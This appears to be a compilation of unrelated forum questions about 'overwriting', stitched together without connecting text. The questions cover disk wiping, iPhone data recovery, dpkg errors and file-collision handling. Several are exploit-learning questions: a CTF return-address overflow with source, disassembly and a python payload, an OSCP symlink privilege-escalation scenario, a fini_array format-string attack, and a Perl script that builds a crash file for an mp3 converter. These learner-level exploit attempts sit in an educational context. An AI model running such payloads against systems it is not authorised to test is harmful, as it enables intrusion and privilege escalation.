Destroying data on storage drives via overwrite methods really doesn’t work?

I’m going to sell a computer hard drive on the Internet, it’s a 500GB SATA hard drive, I really used it 3 or 2 years ago, I never used it again, I used about 20 or 40% of the space.

I have read about various tools and used Hardwipe, first I deleted the volume and recreated it, then with the program (option to clean free space) I used the GOST R 50739-95 method, when it finished then I did it again with the random method (both It took about 6 hours, in total I spent 2 days on this task, and I had several interruptions so I had to disconnect and continue the overwrite).

I have read an article on the internet (I shouldn’t believe everything I read on the internet, but that’s why I am asking this question), where it mentions that overwriting these random bytes is not enough and even if I used the DoD 5220.22-M method the data could To be recoverable, it mentions that a good method is degaussing (but this is really crazy, that is, a disk that used so little space), is this information really true? Should I use a Gutmann method?


Overwrite return address in C

It’s about a CTF Challenge. I’m trying to execute a buffer overflow attack on a C program. The code is :

#include<stdio.h> #include<string.h> #include<stdlib.h>  #include <sys/types.h> #include <unistd.h> #include <stdint.h>  int enable_flag() {    printf("yay\n");    fflush(stdout);    setreuid(geteuid(), getuid());    system("chmod 644 flag.txt");    return 0; }  void overflow (void* inbuf, int inbuflen) {    char buf[4];    memcpy(buf, inbuf, inbuflen); }  int main (int argc, char** argv) {    char filebuf[100];    FILE* file = fopen(argv[1], "r");    int bytes = fread(filebuf, sizeof(char), 100, file);    printf("bytes read: %d\n", bytes);    fflush(stdout);    fclose(file);    overflow(filebuf, bytes);    return 0; } 

After running gdb I got :

(gdb) disas main      Dump of assembler code for function main:        0x000000000040123e <+0>: push   %rbp        0x000000000040123f <+1>: mov    %rsp,%rbp        0x0000000000401242 <+4>: add    $  0xffffffffffffff80,%rsp        0x0000000000401246 <+8>: mov    %edi,-0x74(%rbp)        0x0000000000401249 <+11>:    mov    %rsi,-0x80(%rbp)        0x000000000040124d <+15>:    mov    -0x80(%rbp),%rax        0x0000000000401251 <+19>:    add    $  0x8,%rax        0x0000000000401255 <+23>:    mov    (%rax),%rax        0x0000000000401258 <+26>:    lea    0xdbc(%rip),%rsi        # 0x40201b        0x000000000040125f <+33>:    mov    %rax,%rdi        0x0000000000401262 <+36>:    callq  0x4010d0 <fopen@plt>        0x0000000000401267 <+41>:    mov    %rax,-0x8(%rbp)        0x000000000040126b <+45>:    mov    -0x8(%rbp),%rdx        0x000000000040126f <+49>:    lea    -0x70(%rbp),%rax        0x0000000000401273 <+53>:    mov    %rdx,%rcx        0x0000000000401276 <+56>:    mov    $  0x64,%edx        0x000000000040127b <+61>:    mov    $  0x1,%esi        0x0000000000401280 <+66>:    mov    %rax,%rdi        0x0000000000401283 <+69>:    callq  0x401040 <fread@plt>        0x0000000000401288 <+74>:    mov    %eax,-0xc(%rbp)        0x000000000040128b <+77>:    mov    -0xc(%rbp),%eax        0x000000000040128e <+80>:    mov    %eax,%esi        0x0000000000401290 <+82>:    lea    0xd86(%rip),%rdi        # 0x40201d        0x0000000000401297 <+89>:    mov    $  0x0,%eax        0x000000000040129c <+94>:    callq  0x401080 <printf@plt>        0x00000000004012a1 <+99>:    mov    0x2dd8(%rip),%rax        # 0x404080     <stdout@@GLIBC_2.2.5>        0x00000000004012a8 <+106>:   mov    %rax,%rdi        0x00000000004012ab <+109>:   callq  0x4010b0 <fflush@plt>        0x00000000004012b0 <+114>:   mov    -0x8(%rbp),%rax        0x00000000004012b4 <+118>:   mov    %rax,%rdi        0x00000000004012b7 <+121>:   callq  0x401050 <fclose@plt>        0x00000000004012bc <+126>:   mov    -0xc(%rbp),%edx        0x00000000004012bf <+129>:   lea    -0x70(%rbp),%rax        0x00000000004012c3 <+133>:   mov    %edx,%esi        0x00000000004012c5 <+135>:   mov    %rax,%rdi        0x00000000004012c8 <+138>:   callq  0x401213 <overflow>        0x00000000004012cd <+143>:   mov    $  0x0,%eax        0x00000000004012d2 <+148>:   leaveq         0x00000000004012d3 <+149>:   retq        End of assembler dump.(gdb) disas main 

disas overflow gives :

(gdb) disas overflow Dump of assembler code for function overflow:    0x0000000000401213 <+0>: push   %rbp    0x0000000000401214 <+1>: mov    %rsp,%rbp    0x0000000000401217 <+4>: sub    $  0x20,%rsp    0x000000000040121b <+8>: mov    %rdi,-0x18(%rbp)    0x000000000040121f <+12>:    mov    %esi,-0x1c(%rbp)    0x0000000000401222 <+15>:    mov    -0x1c(%rbp),%eax    0x0000000000401225 <+18>:    movslq %eax,%rdx    0x0000000000401228 <+21>:    mov    -0x18(%rbp),%rcx    0x000000000040122c <+25>:    lea    -0x4(%rbp),%rax    0x0000000000401230 <+29>:    mov    %rcx,%rsi    0x0000000000401233 <+32>:    mov    %rax,%rdi    0x0000000000401236 <+35>:    callq  0x4010a0 <memcpy@plt>    0x000000000040123b <+40>:    nop    0x000000000040123c <+41>:    leaveq     0x000000000040123d <+42>:    retq    End of assembler dump. 

and disas enable_flag gives :

Dump of assembler code for function enable_flag:    0x00000000004011c2 <+0>: push   %rbp    0x00000000004011c3 <+1>: mov    %rsp,%rbp    0x00000000004011c6 <+4>: push   %rbx    0x00000000004011c7 <+5>: sub    $  0x8,%rsp    0x00000000004011cb <+9>: lea    0xe32(%rip),%rdi        # 0x402004    0x00000000004011d2 <+16>:    callq  0x401030 <puts@plt>    0x00000000004011d7 <+21>:    mov    0x2ea2(%rip),%rax        # 0x404080 <stdout@@GLIBC_2.2.5>    0x00000000004011de <+28>:    mov    %rax,%rdi    0x00000000004011e1 <+31>:    callq  0x4010b0 <fflush@plt>    0x00000000004011e6 <+36>:    callq  0x401060 <getuid@plt>    0x00000000004011eb <+41>:    mov    %eax,%ebx    0x00000000004011ed <+43>:    callq  0x401090 <geteuid@plt>    0x00000000004011f2 <+48>:    mov    %ebx,%esi    0x00000000004011f4 <+50>:    mov    %eax,%edi    0x00000000004011f6 <+52>:    callq  0x4010c0 <setreuid@plt>    0x00000000004011fb <+57>:    lea    0xe06(%rip),%rdi        # 0x402008    0x0000000000401202 <+64>:    callq  0x401070 <system@plt>    0x0000000000401207 <+69>:    mov    $  0x0,%eax    0x000000000040120c <+74>:    add    $  0x8,%rsp    0x0000000000401210 <+78>:    pop    %rbx    0x0000000000401211 <+79>:    pop    %rbp    0x0000000000401212 <+80>:    retq    End of assembler dump. 

I followed this tutorial Introduction to return oriented programming but I’m getting always segmentation fault

I have tried this:

./rop.o "$  (python3 -c 'print ("A"*0x4 + "BBBB" + "\xc2\x11\x40")')" 

iPhone data overwrite

How long does it take iPhone 7 (iOS 12.2) to overwrite the data of recently deleted photos/videos?

Does it happen instantly right after I take another photo/video (the new photo replaces the deleted one’s data pointer, and the deleted one is now unrecoverable?), or does it take months?

Thank you!

Looking for a way to overwrite a symbolic link

I’m peparing for OSCP and I found an interesting situation (Alpine Linux).

There is a daemon super_service executed by root that is reading configuration file from /var/super_service/configs/ which is a symbolic link to location that my user john has no write permissions.

$   id uid=1000(john) gid=1000(john) groups=1000(john)  $   ls -la /var/super_service drwxr-xr-x    2 root     root          4096 May  9  2019 . drwxr-xr-x    3 root     root          4096 May  9  2019 .. lrwxrwxrwx    1 root     root            13 May  9  2019 configs -> /etc/super_service/configs  $   ls -la /etc/super_service/configs drwxr-xr-x    1 root     root          4096 Jan 29 12:10 . drwxr-xr-x    1 root     root          4096 Jan 29 12:10 .. -rw-------    1 root     root           283 Jan 23  2019 root.cfg 

Potential flaw is that /var/super_service/configs/ symbolic link permissions are rwx for everyone. If I manage to “redirect” this symbolic link to location controlled by me, I’d be able to control the config file read by super_service. Unfortunately, due to /var/super_service permissions (r-x) I’m not able to remove or replace this symbolic link.

I wonder if this situation is exploitable in any way?

My understanding is that if /var/super_service/configs would be regular file, not symbolic link, with exact permissions I could overwrite this file. But is there an equivalent of overwrite that is applicable for symbolic links?

How to disabel relro to overwrite fini_array element?

I am reading the book Hacking: The art of exploitation and there is a format string exploit example which attempts to overwrite an address of the dtors with the address of a shellcode environment variable. I work on Kali Linux 64-bit and already found out that there is not dtors and so now I try to overwrite the fini_array. I already verified that the exploit writes the right address to the address given but when I run it with the address of fini_array I get a SIGSEV. After reading this I think the problem is that the partial relro won’t let me overwrite fini_array. Now my question is which workaround (maybe some gcc options) I could use to solve my problem.

Unable to Overwrite EIP in Immunity

Though there are answers for questions with same topics this issue has not been addressed before. Iv gone through those posts as well

Im trying to learn about exploit writing. Im a beginner. However I cannot observe my program overwriting EIP

Im writing a .asx file in Perl and loading it into mp3 converter. However if I manually execute the application the file is created and app crashes. But in Immunity Debugger I dont see EIP being overwriten is x41x41..

Could this be because Im executing (on Windows 10 host) and there is Microsoft Compiler Protection?

What could be other possible reasons?

enter image description here


#!C:\Perl64\bin my $  file= "fuzz_file.asx"; my $  junk= "http://"."\x41" x 50000;  open($  FILE,">$  file"); print $  FILE "$  junk"; close($  FILE); print "asx File Created successfully\n"; 

Implicitly overwrite file content

I’m currently programming a tool for downloading stuff from the internet. For the user it is possible to specify a download folder where all downloaded files are stored.

Assume that the program realize that it should save the download to a file that already exists – how should it react.

Intuitively I would say that the program should come up with some kind of dialog asking the user whether it should replace the existing file, save the download to another file or …

However, due to the automatic execution it is NOT possible to ask the user what should be done (replace, use other file, log error, …).

So what should be done in such a case?

Greetings, quant

Overwrite issue trying to install guile

Trying to install “guile-1.8-dev” (downloaded from here) results in the following error:

dpkg: error processing archive guile-1.8-dev_1.8.8+1-8ubuntu3_amd64.deb (--install): trying to overwrite '/usr/lib/', which is also in package guile-1.8-libs 1.8.8+1-8ubuntu3 dpkg-deb: error: paste subprocess was killed by signal (Broken pipe) Processing triggers for libc-bin (2.27-3ubuntu1) ... Errors were encountered while processing:  guile-1.8-dev_1.8.8+1-8ubuntu3_amd64.deb 

Is there any way to get around this? I am running Ubuntu 18.04.